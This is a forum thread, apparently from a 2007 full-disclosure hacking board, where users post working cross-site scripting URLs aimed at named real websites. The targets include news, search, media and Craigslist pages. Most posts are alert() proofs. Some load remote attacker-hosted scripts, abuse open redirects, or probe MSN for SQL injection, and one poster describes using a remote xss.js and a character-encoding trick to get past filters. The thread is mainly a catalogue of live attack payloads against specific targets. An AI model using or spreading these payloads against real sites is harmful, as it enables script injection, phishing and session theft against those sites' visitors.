http://elreg.regaccount.com/register/?product=theregister_newsletter&text_only=1&name=&email=&password=%3Czzz%3E&confirm_password=%3Czzz%3E&country=us&job_function=&other_job_function=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&job_sector=&other_job_sector=&employee_count=&it_spending=&submit=Sign+Up
http://www.theonion.com/content/search/onion/advanced?search=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&restrict=.site:onion

Nice one cryptic.

ht tp://www.ufc.com/index.cfm?fa=search.results&ss=<script>alert('Chuck Liddel')</script>

www.aim.com/help_faq/error_mess/winerrors_buddylist.adp?aolp=%22%3E%3Cscript%3Ealert('Aim')%3C/script%3E

The aim one comes up multiple times.



Edited 3 time(s). Last edit at 03/26/2007 05:57PM by Secks.

aim.com and aol.com (see http://sla.ckers.org/forum/read.php?3,44,page=42#msg-8824 )
I guess we can open an AOL/AIM thread

http://www.filmsandtv.com/wml/searchmovies.wml?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Most people don't realize mobile sites that are meant to be browsed by a mobile devices can still be vulnerable to attacks.

XSS: http://moviles.es.msn.com/error.php?error=11&returnurl=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

SQL: http://aic.latino.msn.com/2002autosuite/clients/msnlatino/MMT.asp?as3_languagecode=18&navigation=gray&as3_make=AUDI');SQL+pwnage



Edited 1 time(s). Last edit at 03/28/2007 05:29PM by beford.

http://help.mapquest.com/jive/kbsearch.jspa?forceEmptySearch=true&advanced=false&childCatID=0&rankBy=10001&parentCatID=1&searchQuery=%22%3E%3Cscript%3Ealert%28%22kefka+owns+mapquest%22%29%3C%2Fscript%3E%3C%2F
http://search.about.com/fullsearch.htm?TopNode=%2F&terms=%22%3E%3Cscript%3Ealert%28%22kefka+owns+about.com%22%29%3C%2Fscript%3E%3C%2F&x=36&y=9
http://custom.marketwatch.com/custom/earthlink-net/quote-news.asp?symb=%22%3E%3Cscript%3Ealert(%22kefka%20owns%20marketwatch.com%22)%3C/script%3E%3C/&osymb=%22%3E%3Cscript%3Ealert(%22kefka%20owns%20marketwatch.com%22)%3C/script%3E%3C/&sid=&time=&freq=&compidx=&comp=&ma=&uf=&lf=&type=&destination=2 pops a few times
http://kb.earthlink.net/main.asp?add=1&vars=s,mode,catID,catTitle,perpage,unsupported,currentPage,exactID,query&s=init&mode=Query&catID=earthlink_KT&catTitle=All%20Categories&perpage=10&unsupported=0&currentPage=0&exactID=&query=%3CSCRIPT/XSS%20SRC=%22http://ha.ckers.org/xss.js%22%3E%3C/SCRIPT%3E did not exit this cleanly

A top 500 thread wouldn't be a bad idea, might get some publicity too.



Edited 4 time(s). Last edit at 03/28/2007 10:25PM by kefka.

http://www.hackerwatch.org/library/?doc=..&page=%3Cscript%3Ealert('xss');%3C/script%3E

-tx @ lowtech-labs.org

tx Wrote:
-------------------------------------------------------
> http://www.hackerwatch.org/library/?doc=..&page=%3
> Cscript%3Ealert('xss');%3C/script%3E

I LOLed hard.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

https://www.scanalert.com/SignUp.sa?act=step1&oc=%27%29return+0%3B%7Dalert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F

Hackersafe?

wow!!! I am always late, which i dunno why. But wow, XSS all the famous site. That is so cool...

http://hackathology.blogspot.com

http://www.ip2state.com/map.asp?s=ip&city=<script>alert('LAWL');</script>&lat=60.0629&long=-32.1209&ses=947208921


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

From the series "The power of XSS and April 1st fool's day":

http://www.securitylab.ru/news/extra/293608.php

Decided to sift through Alexa's Top and here are some:

http://busca.uol.com.br/www/index.html?ref=homeuol&q=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E&x=0&y=0

http://szukaj.onet.pl/zdjecia.html?qt=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&col=all&st=1&s=1

http://search.rediff.com/imgsrch/default.php?MT_OLD=hello&MT=%3Cscript%3Ealert(1)%3C/script%3E



Edited 1 time(s). Last edit at 04/01/2007 05:29PM by malorn.

Awesome AnDrEw Wrote:
-------------------------------------------------------
> http://www.ip2state.com/map.asp?s=ip&city=alert('L
> AWL');&lat=60.0629&long=-32.1209&ses=947208921


Glad you found a use for that URL =oP

Unfortunately there wasn't a lot to work with on that site.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://portal.spidynamics.com/utility/Redirect.aspx?U=javascript:alert(%22xss%22)

It never ceases to amaze that how many site have problems shutting down 302's

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

I've been on a real roll tonight with XSS vulnerabilities on television News sites. There must be some great conspiracy brewing, because it seems like virtually all "ABC7" news sites are vulnerable. I'm only posting 2 here, but if you search Google you'll find a shitload of them, and all of them have problems.

http://search.abclocal.go.com/search/search?station=kabc&search=siteSearch&q=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

http://dynamic.allbrittontv.com/mainsearch.hrb?s=wjla&string=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Two of my favorite television channels.

http://www.aetv.com/search/global.do?keywords="><script>alert("Why%20is%20there%20no%20pornography%20on%20the%20Arts%20and%20Entertainment%20channel?");</script><!--

http://www.history.com/search.do?searchText="><script>alert("Protip:%20Germany%20loses%20the%20war.");</script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

digi7al64, did spi fix it (partially), or did you only test with FF?
Anyway, it's still subject for the "Redirect Edition"
http://portal.spidynamics.com/utility/Redirect.aspx?U=http://ha.ckers.org/images/stallowned.jpg

Sorry, the forum dropprd the ); on the end

And yes I only tested in Firefox... oops
http://portal.spidynamics.com/utility/Redirect.aspx?U=javascript:alert(%22xss%22%29;

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

http://sfbay.craigslist.org/search/sss?query="><script>alert(1);</script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

America's Most Wanted
http://www.amw.com/login/sign_up1.cfm?email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

NOTE: Can you please search before posting. Recently i have seen the same stuff coming up.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Maybe it would also make sense to post a poc which works with an inclusion - an alert proofs nothing.

What do you think?

Sorry, I don't search the thread prior to posting, because it's over 40 pages long so I apologize if I expose an already disclosed vulnerability.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

@Awesome AnDrEw: I agree - what about thinking about a new way to collect found issues like a trac or sth like that?

What you can do temporarily is do a search in the FD forum with exact match and search for whatever.com then you can roughly see what posts to this topic have had that domain XSSed and see if its the same.

I generally just try finding vulnerabilities in sites I some how visited, or if my girlfriend visited and I saw a potential hole. As for the proof of concept generally the alert is enough to see whether characters are escaped, and if so in most cases String.fromCharCode works fine. Lately I've been using this file of a script I edited a little (someone posted it on an anonymous forum once, and I understand how it works, but I'm unfamiliar with a lot of Javascript syntax): http://www.awesomeandrew.net/fd/xss.js


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Rather pointless, but it's the first one I've found: http://www.take2theweb.com/_tools/popup.html?http://www.google.co.uk/intl/en_uk/images/logo.gif'onload=alert('XSS');'

Three XSS holes on youtube:
http://christ1an.blogspot.com/2007/04/youtube-has-added-some-features.html